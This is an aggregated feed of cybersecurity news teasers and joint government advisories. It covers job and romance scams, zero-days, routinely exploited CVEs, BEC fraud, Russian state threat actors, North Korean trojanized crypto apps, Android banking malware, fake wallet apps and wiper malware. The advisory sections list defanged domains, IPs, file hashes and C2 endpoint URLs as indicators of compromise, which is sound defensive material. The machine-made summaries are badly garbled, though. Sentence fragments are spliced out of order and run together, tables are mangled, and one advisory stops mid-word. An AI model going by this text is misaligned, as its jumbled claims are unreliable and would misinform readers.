Caught off guard, we may click the supplied link or ask for more information, to which the fake headhunter will reply with a not-so-convincing message that you have what it takes to get the job and asks you to pay an advance fee, possibly for training, or to fill in your personal information through, for example, a Google Form. https://twitter.com/chidi_ora/status/1501321537135136770 These offers often request additional personal information on the first contact even if what you’ve already provided in your LinkedIn profile and résumé, such as your name, residence age and contact details, is more than enough to get you a job interview.** Scammers target jobseekers with fake emails like this to make them think that recruiters may be interested in hiring them.#ScamAdviserAlerts #ScamAlert #OnlineScam #Phishing #LinkedIn pic.twitter.com/6p3yrZhBZZ — ScamAdviser (@scamadviser) March 25, 2022 Bogus job offers Other ways of stealing logins involve offers for well-paying “job offers” that are within reach upon replying to a direct message. Fake notifications Email notifications have become a common presence in our mailboxes, making their way to a folder where they usually stay forever, or at least until they are deleted. "The bitter truth about how fraudsters dupe online daters in this new twist on romance fraud
The post There’s no sugarcoating it: That online sugar daddy may be a scammer appeared first on WeLiveSecurity
"Autosummary:
If you’re on a dating or social media site, be aware that fraudsters may: ask the victim to DM them, in order to appear less predatory, possibly using multiple user accounts or accounts they created only recently like ‘mainstream’ romance fraudsters, they quickly attempt to take the conversation onto ‘unpoliced’ communications platforms like Google Hangouts or WhatsApp ask the mark to share their bank and/or card details so they can deposit money into their account offer to pay off the victim’s debts or credit card balances or buy expensive gifts for them, possibly in return for their sensitive photos ask for a ‘small’ upfront payment, possibly in Bitcoin, first as some sort of proof of loyalty, often creating a sense of urgency in the process Staying safe from sugar daddy scammers There are some more general things you can do to insulate yourself or your friends and family from the risks of sugar daddy scams. There are various ways a sugar daddy scam can work, but it all results in the same depressing outcome for the victim, who is left deflated, humiliated, angry and out-of-pocket.Indeed, as is the case with ‘mainstream’ romance scams, the real number of victims is impossible to tell, as many of them are too embarrassed or traumatized to report their experience. "Here"s what you should know about some of the nastiest mobile malware around – from malicious software that takes phones and data hostage to RATs that allow hackers to control devices remotely
The post 3 most dangerous types of Android malware appeared first on WeLiveSecurity
"Autosummary:
"Organizations need to get better at mitigating threats from unknown vulnerabilities, especially as both state-backed operatives and financially-motivated cybercriminals are increasing their activity
The post What’s behind the record‑high number of zero days? appeared first on WeLiveSecurity
"Autosummary:
Although the firm recognized that this could be due to more detections, it also argued the rise could be down to: The move toward cloud hosting, mobile, and Internet of Things (IoT) technologies, which increases the volume and complexity of internet-connected software and systems An expansion of the exploit broker marketplace, as more resources are shifted toward research and development of zero-days, both by private companies and threat groups Microsoft, Apple and Google products accounted for three-quarters of those zero-day bugs found by Mandiant, with state groups led by China the “primary actors”. The same old techniques Somewhat surprisingly, despite the surge in zero-days, the attacks themselves are still using tried-and-tested techniques, according to Google’s Stone.Consider: Continuous risk-based patching of known vulnerabilities Cybersecurity awareness training for all staff Supply chain security steps to ensure partners are thoroughly audited for cyber-hygiene Software supply chain checks to ensure open source components used to build internal software are free from vulnerabilities/malware Continuous configuration management to mitigate the risk of accidentally exposed systems Effective cybersecurity means protecting the organization against both known and unknown vulnerabilities. "This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security Centre (NCSC-UK). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.
U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets.
The cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.
Download the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb).
Autosummary:
Summary This joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security CentreTable 2: Additional Routinely Exploited Vulnerabilities in 2021 CVE Vendor and Product Type CVE-2021-42237 Sitecore XP RCE CVE-2021-35464 ForgeRock OpenAM server RCE CVE-2021-27104 Accellion FTA OS command execution CVE-2021-27103 Accellion FTA Server-side request forgery CVE-2021-27102 Accellion FTA OS command execution CVE-2021-27101 Accellion FTA SQL injection CVE-2021-21985 VMware vCenter Server RCE CVE-2021-20038 SonicWall Secure Mobile Access (SMA) RCE CVE-2021-40444 Microsoft MSHTML RCE CVE-2021-34527 Microsoft Windows Print Spooler RCE CVE-2021-3156 Sudo Privilege escalation CVE-2021-27852 Checkbox Survey Remote arbitrary code execution CVE-2021-22893 Pulse Secure Pulse Connect SecureImproper SQL command neutralization, allowing for credential access CVE-2021-1675 Windows Print Spooler RCE CVE-2020-2509 QNAP QTS and QuTS hero Remote arbitrary code execution CVE-2019-19781 Citrix Application Delivery Controller (ADC) and Gateway Arbitrary code execution CVE-2019-18935 Progress Telerik UI for ASP.NET AJAX Code execution CVE-2018-0171 Cisco IOS Software and IOS XE Software Remote arbitrary code execution CVE-2017-11882 Microsoft Office RCE CVE-2017-0199 Microsoft Office RCE Mitigations Contact Information Revisions April 27, 2022: Initial Version "BEC fraud generated more losses for victims than any other type of cybercrime in 2021. It’s long past time that organizations got a handle on these scams.
The post The trouble with BEC: How to stop the costliest internet scam appeared first on WeLiveSecurity
"Autosummary:
Organizations should consider the following: Invest in advanced email security that leverages AI to discern suspicious email patterns and sender writing styles that leverages AI to discern suspicious email patterns and sender writing styles Update payment processes so that large wire transfers must be signed off by two employees so that large wire transfers must be signed off by two employees Doublecheck any payment requests again with the person allegedly making the request again with the person allegedly making the request Build BEC into staff security awareness training such as in phishing simulations such as in phishing simulations Keep updated on the latest trends in BEC and be sure to update training courses and defensive measures accordingly Like any fraudsters, BEC actors will always go after low-hanging fruit.The report continues: “In those meetings, the fraudster would insert a still picture of the CEO with no audio, or a ‘deepfake’ audio through which fraudsters, acting as business executives, would then claim their audio/video was not working properly.That actually makes it only the ninth most popular crime type of the year, far behind the leaders phishing (324,000), non-payment/non-delivery (82,000) and personal data breach (52,000). "As the Five Eyes nations warn of attacks against critical infrastructure, we look at the potentially cascading effects of such attacks and how essential systems and services can ramp up their defense
The post Cybersecurity threats to critical infrastructure – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Lessons from history and recent attacks on critical infrastructure throw into sharp relief the need to better safeguard our essential systems and services
The post Critical infrastructure: Under cyberattack for longer than you might think appeared first on WeLiveSecurity
"Autosummary:
The first time the network of an entire country faced a cyberattack On the morning of April 27th 2007, like domino pieces Estonia’s government communications, banks, phone operators, media websites, ATM machines, and the website of Parliament, along with many other online services simply shut down. According to a 2021 study by Claroty that surveyed 1,000 IT and OT security professionals working in critical infrastructure in the US, the UK, Germany, France, and Australia, 65% indicated concern over attacks on critical infrastructure. Attackers used several well-known tactics, from ping floods, a type of denial-of-service (DoS) attack, to malformed web queries and email spam, most of them originating from outside Estonia. A few months after, on December 9th, the EU’s health regulator, the European Medicines Agency (EMA), revealed it had suffered a cyberattack.The group, however, is known to provide ransomware as a service to affiliates, and received a US$4.4 million ransom payment, half of which was later recovered by the FBI. "Actions critical infrastructure organizations should implement to immediately protect against Russian state-sponsored and criminal cyber threats:
• Patch all systems. Prioritize patching known exploited vulnerabilities.
• Enforce multifactor authentication.
• Secure and monitor Remote Desktop Protocol and other risky services.
• Provide end-user awareness and training.
The cybersecurity authorities of the United States[1][2][3], Australia[4], Canada[5], New Zealand[6], and the United Kingdom[7][8] are releasing this joint Cybersecurity Advisory (CSA). The intent of this joint CSA is to warn organizations that Russia’s invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. This activity may occur as a response to the unprecedented economic costs imposed on Russia as well as materiel support provided by the United States and U.S. allies and partners.
Evolving intelligence indicates that the Russian government is exploring options for potential cyberattacks (see the March 21, 2022, Statement by U.S. President Biden for more information). Recent Russian state-sponsored cyber operations have included
Autosummary:
SVR cyber actors’ novel tooling and techniques include: Custom, sophisticated multi-platform malware targeting Windows and Linux systems (e.g., GoldMax and TrailBlazer); and Lateral movement via the “credential hopping” technique, which includes browser cookie theft to bypass multifactor authentication (MFA) on privileged cloud accounts.[11] High-Profile Activity: the U.S. Government, the Government of Canada, and the UK Government assess that SVR cyber threat actors were responsible for the SolarWinds Orion supply chain compromise and the associated campaign that affected U.S. government agencies, critical infrastructure entities, and private sector organizations.[12][13][14] Also known as: APT29, COZY BEAR, CozyDuke, Dark Halo, The Dukes, NOBELIUM, and NobleBaron, StellarParticle, UNC2452, YTTRIUM [15] Resources: for more information on SVR, see: For more information on the SolarWinds Orion supply chain compromise, see: GRU, 85th Main Special Service Center Overview: GTsSS, or Unit 26165, is an APT group that has operated since at least 2004 and primarily targets government organizations, travel and hospitality entities, research institutions, and non-governmental organizations, in addition to other critical infrastructure organizations.The U.S. Government and UK Government assess that GTsSS actors used a Kubernetes® cluster to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide.[17] Also known as: APT28, FANCY BEAR, Group 74, IRON TWILIGHT, PawnStorm, Sednit, SNAKEMACKEREL, Sofacy, STRONTIUM, Swallowtail, TG-4127, Threat Group-4127, and Tsar Team [18] Resources: for more information on GTsSS, see the MITRE ATT&CK webpage on APT28. Russian General Staff Main Intelligence Directorate (GRU), 85th Main Special Service Center (GTsSS) GRU’s Main Center for Special Technologies (GTsST) Russian Ministry of Defense, Central Scientific Institute of Chemistry and Mechanics (TsNIIKhM) The Russian Federal Security Service Overview: FSB, the KGB’s successor agency, has conducted malicious cyber operations targeting the Energy Sector, including UK and U.S. energy companies, U.S. aviation organizations, U.S. government and military personnel, private organizations, cybersecurity companies, and journalists. High-Profile Activity: in 2017, FSB employees, including one employee in the FSB Center for Information Security (also known as Unit 64829 and Center 18), were indicted by the U.S. Department of Justice (DOJ) for accessing email accounts of U.S. government and military personnel, private organizations, and cybersecurity companies, as well as email accounts of journalists critical of the Russian government.[9] More recently, in 2021, FSB Center 16 officers were indicted by the U.S. DOJ for their involvement in a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data.These groups include: The CoomingProject Killnet MUMMY SPIDER SALTY SPIDER SCULLY SPIDER SMOKEY SPIDER WIZARD SPIDER The Xaknet Team Note: although some cybercrime groups may conduct cyber operations in support of the Russian government, U.S., Australian, Canadian, New Zealand, and UK cyber authorities assess that cyber criminals will most likely continue to operate primarily based on financial motivations, which may include targeting government and critical infrastructure organizations.This activity resulted in websites—including sites belonging to the Georgian government, courts, non-government organizations (NGOs), media, and businesses—being defaced and interrupted the service of several national broadcasters.[21]22][23] Also known as: ELECTRUM, IRON VIKING, Quedagh, the Sandworm Team, Telebots, VOODOO BEARFor more information on the heightened cyber threat to critical infrastructure organizations, see the following resources: U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge critical infrastructure network defenders to prepare for and mitigate potential cyber threats—including destructive malware, ransomware, DDoS attacks, and cyber espionage—by hardening their cyber defenses and performing due diligence in identifying indicators of malicious activity. "Here’s what to know about vulnerabilities in more than 100 Lenovo consumer laptop models and what you can do right away to stay safe – all in under three minutes
The post Is your Lenovo laptop vulnerable to cyberattack? appeared first on WeLiveSecurity
"Autosummary:
"Actions to take today to mitigate cyber threats to cryptocurrency:
• Patch all systems.
• Prioritize patching known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Use multifactor authentication.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Treasury Department (Treasury) are issuing this joint Cybersecurity Advisory (CSA) to highlight the cyber threat associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020. This group is commonly tracked by the cybersecurity industry as Lazarus Group, APT38, BlueNoroff, and Stardust Chollima. For more information on North Korean state-sponsored malicious cyber activity, visit hxxps://www.us-cert.cisa.gov/northkorea.
The U.S. government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs). The activity described in this advisory involves social engineering of victims using a variety of communication platforms to encourage individuals to download trojanized cryptocurrency applications on Windows or macOS operating systems. The cyber actors then use the applications to gain access to th "
Autosummary:
alticgo[.]com Information as of August 2020: IP Address: 108.170.55[.]202 Registrar: NetEarth One Inc. Created: August 8, 2020 Expires: August 8, 2021 765a79d22330098884e0f7ce692d61c40dfcf288826342f33d976d8314cfd819 Tags: dropper peexe nsis Name: AlticGO.exe Size: 43.54 MB (45656474 bytes) MD5: 1c7d0ae1c4d2c0b70f75eab856327956 SHA-1: f3263451f8988a9b02268f0fb6893f7c41b906d9 SHA-256: 765a79d22330098884e0f7ce692d61c40dfcf288826342f33d976d8314cfd819 ssdeep: 786432:optZmVDkD1mZ1FggTqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yVPUXi7:opzKDginspAU6JXnJ46X+eC6cySihWVX Compilation timestamp: 2018-12-15 22:26:14 UTC e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad Tags: dropper peexe nsis Name: AlticGO_R.exe Size: 44.58 MB (46745505 bytes) MD5: 855b2f4c910602f895ee3c94118e979a SHA-1: ff17bd5abe9f4939918f27afbe0072c18df6db37 SHA-256: e3d98cc4539068ce335f1240deb1d72a0b57b9ca5803254616ea4999b66703ad ssdeep: 786432:LptZmVDkD1mQIiXUBkRbWGtqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yH:LpzKDgzRpWGwpAU6JXnJ46X+eC6cySiI Compilation timestamp: 2020-02-12 16:15:17 UTC 8acd7c2708eb1119ba64699fd702ebd96c0d59a66cba5059f4e089f4b0914925 Tags: dropper peexe nsis Name: AlticGO.exe Size: 44.58 MB (46745644 bytes) MD5: 9a6307362e3331459d350a201ad66cd9 SHA-1: 3f2c1e60b5fac4cf1013e3e1fc688be490d71a84 SHA-256: 8acd7c2708eb1119ba64699fd702ebd96c0d59a66cba5059f4e089f4b0914925 ssdeep: 786432:AptZmVDkD1mjPNDeuxOTKQqqLGAU6JXnjmDQ4YBXpleV0RnJYJKoSuDySLGh7yV7:ApzKDgqPxeuLpAU6JXnJ46X+eC6cySiG Compilation timestamp: 2020-02-12 16:15:17 UTC Esilet Esilet claims to offer live cryptocurrency prices and price predictions.SHA-256: 9ba02f8a985ec1a99ab7b78fa678f26c0273d91ae7cbe45b814e6775ec477598 ssdeep: 1572864:lffyoUnp5xmHVUTd+GgNPjFvp4YEbRU7h8cvjmUAm4Du73X0unpXkU:lfqHBmHo+BPj9CYEshLqcuAX0I0 9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa Tags: trojan macho Name: Esilet-tmpzpsb3 Size: 510.37 KB (522620 bytes) MD5: 1ca31319721740ecb79f4b9ee74cd9b0 SHA-1: 41f855b54bf3db621b340b7c59722fb493ba39a5 SHA-256: 9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa ssdeep: 6144:wAulcT94T94T97zDj1I/BkjhkbjZ8bZ87ZMSj71obV/7NobNo7NZTb7hMT5ETZ8I:wDskT1UBg2lirFbpR9mJGpmN C2 Endpoints: hxxps://greenvideo[.]nl/wp-content/themes/top.php hxxps://dafnefonseca[.]com/wp-content/themes/top.php hxxps://haciendadeclarevot[.]com/wp-content/top.php dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156 Tags: trojan macho Name: Esilet-tmpg7lpp Size: 38.24 KB (39156 bytes) MD5: 9578c2be6437dcc8517e78a5de1fa975 SHA-1: d2a77c31c3e169bec655068e96cf4e7fc52e77b8 SHA-256: dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156 ssdeep: 384:sdaWs0fDTmKnY4FPk6hTyQUitnI/kmCgr7lUryESll4yg9RpEwrUifJ8ttJOdy:sdayCkY4Fei9mhy/L9RBrny6y C2 Endpoints: hxxps://sche-eg[.]org/plugins/top.php hxxps://www.vinoymas[.]ch/wp-content/plugins/top.php hxxps://infodigitalnew[.]com/wp-content/plugins/top.php CreAI Deck CreAI Deck claims to be a platform for “artificial intelligence and deep learning.” creaideck[.]com Information as of March 2020: IP Address: 38.132.124[.]161 Registrar: NameCheap, Inc. Created: March 9, 2020 Expires: March 9, 2021 aideck[.]net Information as of June 2020: IP Address: 89.45.4[.]151 Registrar: NameCheap, Inc. Created: June 22, 2020 Expires: June 22, 2021 867c8b49d29ae1f6e4a7cd31b6fe7e278753a1ba03d4be338ed11fd1efc7dd36 Tags: trojan peexe Name: win32.bin Size: 2.10 MB (2198684 bytes) MD5: 5d43baf1c9e9e3a939e5defd8f8fbd8d SHA-1: d5ff73c043f3bb75dd749636307500b60a436550 dafom[.]dev Information as of February 2022: IP Address: 45.14.227[.]58 Registrar: NameCheap, Inc. Created: February 7, 2022 Expires: February 7, 2023 60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18 Tags: dropper macos Name: DAFOM-1.0.0.dmg Size: 87.91 MB (92182575 bytes) MD5: c2ea5011a91cd59d0396eb4fa8da7d21 SHA-1: b2d9ca7b6d1bbbe4864ea11dfca343b7e15597d8 SHA-256: 60b3cfe2ec3100caf4afde734cfd5147f78acf58ab17d4480196831db4aa5f18 ssdeep: 1572864:LGLBnolF9kPEiKOabR2QEs1B1/LuUQrbecE6Xwijkca/pzpfaLtIP:LGVnoT9kPZK9tVEwBxWbecR5Faxzpf0M TokenAIS TokenAIS purports to help “build a portfolio of AI-based trading” for cryptocurrencies. tokenais[.]com Information as of January 2022: IP Address: 199.188.103[.]115 Registrar: NameCheap, Inc. Created: January 27, 2022 Expires: January 27, 2023 5b40b73934c1583144f41d8463e227529fa7157e26e6012babd062e3fd7e0b03 Tags: dropper macos Name: TokenAIS.app.zip Size: 118.00 MB (123728267 bytes) MD5: 930f6f729e5c4d5fb52189338e549e5e SHA-1: 8e67006585e49f51db96604487138e688df732d3 SHA-256: 5b40b73934c1583144f41d8463e227529fa7157e26e6012babd062e3fd7e0b03 ssdeep: 3145728:aMFJlKVvw4+zLruAsHrmo5Vvw4+zLruAsHrmob0dC/E:aUlKtw4+/r2HNtw4+/r2HnMCM CryptAIS CryptAIS uses the same language as TokenAIS to advertise that it “helps build a portfolio of AI-based trading.” "ESET researchers analyzed three malicious applications targeting customers of eight Malaysian banks
The post Fake e‑shops on the prowl for banking credentials using Android malware appeared first on WeLiveSecurity
"Autosummary:
UZ Network IP Provider First seen Details 185.244.150[.]159 Dynadot 2022-01-20 19:36:29 token2[.]club Distribution website 194.195.211[.]26 Hostinger 2022-01-08 14:33:32 grabamaid-my[.]online Distribution website 172.67.177[.]79 Hostinger 2022-01-03 08:20:50 maidacalls[.]online Distribution website 172.67.205[.]26 Hostinger 2022-01-03 13:40:24 petsmore[.]online Distribution website 172.67.174[.]195 Hostinger 2022-02-23 00:45:06 cleangmy[.]site Distribution website N/A Hostinger 2022-01-24 17:40:14 my-maid4us[.]site Distribution website N/A Hostinger 2022-01-27 14:22:10 yourmaid[.]online Distribution website 194.195.211[.]26 Hostinger 2021-11-19 05:35:01 muapks[.]online C&C server 194.195.211[.]26 Hostinger 2021-11-19 05:23:22 grabsapks[.]online C&C server 104.21.19[.]184 Hostinger 2022-01-20 03:47:48 grabmyapks90[.]online C&C server 104.21.29[.]168 Hostinger 2021-12-22 12:35:42 m4apks[.]online C&C server 172.67.208[.]54 Hostinger 2022-01-17 09:22:02 maid4uapks90[.]online C&C server 172.67.161[.]142 Hostinger 2022-01-22 06:42:37 grabmaidsapks80[.]online C&C server 2.57.90[.]16 Hostinger 2022-01-10 23:51:29 puapks[.]online C&C server 124.217.246[.]203 Hostinger 2021-09-15 03:50:28 124.217.246[.]203:8099 C&C server 172.67.166[.]180> Hostinger 2021-12-24 15:54:34 meapks[.]xyz C&C server MITRE ATT&CK techniques This table was built using version 10 of the ATT&CK framework.The targeted banks are Maybank, Affin Bank, Public Bank Berhad, CIMB bank, BSN, RHB, Bank Islam Malaysia, and Hong Leong Bank, as seen in Figure 4.All seven websites impersonated services that are only available in Malaysia: six of them, Grabmaid, Maria’s Cleaning, Maid4u, YourMaid, Maideasy and MaidACall, offer cleaning services, and the seventh is a pet store named PetsMore. Takeaways To protect yourself against this type of threat, first, try to ensure that you are using legitimate websites to shop: Verify if the website is secure, i.e., its URL begins with https:// .Make sure that you are actually redirected to the Google Play store when getting an application Use software or hardware 2FA instead of SMS when possible Use mobile security solutions to detect harmful websites and malicious apps Conclusion The observed campaign is a fake e-shop scheme targeting the banking credentials of Android users in Malaysia. To make sure the threat actors can get into their victims’ bank accounts, the fake e-shop applications also forward all SMS messages received by the victim to the operators in case they contain Two-Factor Authentication (2FA) codes sent by the bank (see Figure 7). "Why has the conflict in Ukraine not caused the much anticipated global cyber-meltdown?
The post Is a nation‑state digital deterrent scenario so far‑fetched? appeared first on WeLiveSecurity
"Autosummary:
However, it does appear that most of the cyberattacks reported, and potentially attributable to the conflict, to date, are limited, targeted, and focused on those directly in the war zone or in the communications sector. In 2017, the leak of the US National Security Agency’s (NSA) hacking tools, which included EternalBlue, presented a method of initial compromise subsequently utilized by WannaCryptor (aka WannaCry), NotPetya, and BadRabbit ransomware causing over US$1 billion worth of damages in over 65 countries. "ESET Research uncovers a sophisticated scheme that distributes trojanized Android and iOS apps posing as popular cryptocurrency wallets
The post Crypto malware in patched wallets targeting Android and iOS devices appeared first on WeLiveSecurity
"Autosummary:
NU Network IP Provider First seen Details 185.244.150[.]159 Dynadot 2022-01-20 19:36:29 token2[.]club Distribution website 3.33.236[.]231 GoDaddy 2022-01-27 16:55:51 imtoken[.]porn Distribution website 172.67.210[.]44 广州云 讯 信息科技有限公司 2022-01-24 12:53:46 imtken[.]cn Distribution website 172.67.207[.]186 GoDaddy 2021-12-01 17:57:00 im-token[.]one Distribution website 47.243.75[.]229 GoDaddy 2021-12-09 11:22:03 imtokenep[.]com Distribution website 154.82.111[.]186 GoDaddy 2022-01-24 11:43:46 imttoken[.]org Distribution website 104.21.89[.]154 GoDaddy 2022-01-24 11:26:23 imtokens[.]money Distribution website 104.21.23[.]48 N/A 2022-01-06 12:24:28 mtokens[.]im Distribution website 162.0.209[.]104 Namecheap 2020-10-02 11:14:06 tokenweb[.]online Distribution website 156.226.173[.]11 GoDaddy 2022-01-27 17:04:42 metamask-wallet[.]xyz Distribution website 103.122.95[.]35 GoDaddy 2022-01-24 11:04:56 metemas[.]me Distribution website 104.21.34[.]145 GoDaddy 2021-11-12 20:41:32 metamasks[.]me Distribution website 8.212.40[.]178 TopNets Technology 2021-05-31 08:29:39 metamask[.]hk Distribution website 45.116.163[.]65 Xin Net Technology 2021-10-18 16:24:49 metamaskey[.]com Distribution website 172.67.180[.]104 NameSilo 2021-10-01 13:26:26 2022mask[.]com Distribution website 69.160.170[.]165 Hefei Juming Network Technology 2022-01-13 12:25:38 metamadk[.]com Distribution website 104.21.36[.]169NameSilo 2021-12-28 06:57:00 tokenpockets[.]org Distribution website 216.83.46[.]49 Dynadot 2022-01-17 17:22:40 app-coinbase[.]co Distribution website 172.67.182[.]118 Gandi SAS 2022-02-13 00:46:46 imtoken[.]sx Distribution website 104.21.34[.]81 N/A 2022-01-20 18:24:30 imtoken.net[.]im Distribution website 104.21.87[.]75 Nets To 2022-02-09 09:09:38 imtoken.cn[.]com Distribution website 104.21.11[.]70 NETMASTER SARL 2022-02-09 09:08:05 imtoken[.]tg Distribution website 172.67.187.149 NameSilo 2022-02-06 03:52:06 update.imdt[.]cc C&C 97.74.83[.]237 GoDaddy 2022-01-27 18:44:33 imbbq[.]co C&C 172.67.189[.]148 GoDaddy 2022-01-27 16:07:53 ds-super-admin.imtokens[.]money C&C 156.226.173[.]11 GoDaddy 2022-01-19 14:59:48 imtokenss.token-app[.]cc C&C 45.154.213[.]11Hosting Concepts B.V. d/b/a 2018-09-11 23:00:00 master-consultas[.]com C&C 104.219.248[.]112 Namecheap 2022-01-19 23:03:52 jaxxwalletinc[.]live C&C 50.87.228[.]40 FastDomain 2021-09-09 21:15:10 jabirs-xso-xxx-wallet[.]com C&C 88.80.187[.]8 Tucows Domains 2022-01-06 03:52:05 jaxx.podzone[.]orgNamecheap 2022-01-18 11:34:56 ariodjs[.]xyz C&C 199.36.158[.]100 MarkMonitor 2022-02-03 02:22:17 walletappforbit.web[.]app C&C 195.161.62[.]125 REGRU-SU 2019-08-04 23:00:00 jaxx[.]su C&C 111.90.156[.]9 REGRU-SU 2021-09-29 03:12:49 jaxx[.]tf C&C 111.90.145[.]75NameSilo 2021-11-28 03:54:13 metemasks[.]live Distribution website 45.116.163[.]65 阿里云 计 算有限公司(万网) 2021-12-10 15:39:07 bitpiecn.com[.]cn Distribution website 45.116.163[.]65 Xin Net Technology 2021-11-06 13:25:43 tokenp0cket[.]com Distribution website 104.21.24[.]64 NameSilo 2021-11-14 07:29:44 im-tokens[.]info Distribution website 104.21.70[.]114NameSilo 2021-11-22 08:20:59 onekeys[.]dev Distribution website 206.119.82[.]147 Gname 2021-12-23 21:41:40 metamaskio[.]vip Distribution website 45.116.163[.]65 Xin Net Technology 2021-12-10 15:33:41 zh-imtoken[.]com Distribution website 47.243.117[.]119 广州云 讯 信息科技有限公司 2021-10-18 11:36:07 bitoken.com[.]cn Distribution website 104.21.20[.]159NameSilo 2021-11-26 18:39:27 matemasks[.]date Distribution website 172.67.159[.]121 NameSilo 2022-02-06 03:48:54 bitpio[.]com Distribution website 172.67.171[.]168 NameSilo 2022-02-06 03:50:25 onekeys[.]mobi Distribution website 172.67.133[.]7Gandi SAS 2022-02-13 00:51:18 bh.imtoken[.]sx C&C 172.67.142[.]90 Nets To 2022-02-09 09:18:54 ht.imtoken.cn[.]com C&C 20.196.222.119 Name.com 2022-02-13 00:59:59 api.tipi21341[.]com C&C 89.223.124[.]75The compromise and secret seed phrase exfiltration from the victim’s device (iOS) Leaked source code ESET Research discovered that the source code of the front-end and back-end, together with recompiled and patched mobile apps included in these malicious wallet schemes, was publicly shared on at least five Chinese websites and in a few Telegram groups in November 2021.NameSilo 2021-09-24 10:03:29 metamask.tptokenm[.]live C&C 172.67.223[.]58 GoDaddy 2022-01-19 22:51:08 two.shayu[.]la C&C 45.154.213[.]18 Xin Net Technology 2018-08-03 23:00:00 jdzpfw[.]com C&C 104.21.86[.]197We assume these groups were created by the threat actor behind this scheme looking for further distribution partners, suggesting options such as telemarketing, social media, advertisement, SMS, third-party channels, fake websites etc.It has been distributed through fake websites, mimicking legitimate wallet services such as Metamask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey.These malicious apps were able to steal victims’ secret seed phrases by impersonating Coinbase, imToken, MetaMask, Trust Wallet, Bitpie, TokenPocket, or OneKey.This is further supported by the public sharing, in November 2021, of the source code of the front-end and back-end distribution website, including the recompiled APK and IPA files. If you either already created a new, or restored an old, wallet using such a malicious application, we advise immediately creating a brand-new wallet with a trusted device and application and transferring all funds to it. We would like to appeal to the cryptocurrency community, mainly newcomers, to stay vigilant and use only official mobile wallets and exchange apps, downloaded from official app stores that are explicitly linked to the official websites of such services, and to remind iOS device users of the dangers of accepting configuration profiles from anything but the most trustworthy of sources.NameSilo 2021-11-19 16:39:52 lmtokenn[.]cc Distribution website 104.21.61[.]17 NameSilo 2021-12-30 12:33:04 lntokems[.]club Distribution website 104.21.26[.]245 "This is the third time in as many weeks that ESET researchers have spotted previously unknown data wiping malware taking aim at Ukrainian organizations
The post CaddyWiper: New wiper malware discovered in Ukraine appeared first on WeLiveSecurity
"Autosummary:
Ukraine in the crosshairs In January of this year, another data wiper, called WhisperGate, swept through the networks of multiple organizations in Ukraine. "No sector or organization is immune to rapidly escalating threats, but when it comes to healthcare, the stakes couldn’t be higher
The post Securing healthcare: An IT health check on the state of the sector appeared first on WeLiveSecurity
"Autosummary:
Among the lessons learned were: AV software had been set to “monitor” mode, meaning it didn’t block malicious files Failure to act swiftly after detection of malicious activity on a Microsoft Windows Domain Controller AV software failed to quarantine malicious files after detecting Cobalt Strike, a tool commonly used by ransomware groups HSE’s security operations (SecOps) team advised a server restart when contacted about widespread threat events at multiple hospitals Ransomware attacks on French hospitals at Dax and Villefranche-sur-Saone forced patients to be diverted to other facilities at the height of the COVID-19 crisis.In response, the US Department of Health and Human Services, for example, has issued an alert for the sector, singling out HermeticWiper, a new data wiper discovered by ESET researchers, as an example of an acute risk.No sector or organization is immune to rapidly escalating threats, but when it comes to healthcare, the stakes couldn’t be higher Even prior to Russia’s invasion of Ukraine, there was considerable fear that military escalation would bleed (further) into cyberspace and be followed by a rash of impactful digital assaults with international implications.Indeed, while a now-infamous ransomware incident in Germany is not thought to have directly caused the death of a patient, it was one of the potent harbingers of the potential real-world impact of virtual attacks, when life-saving systems are taken offline. "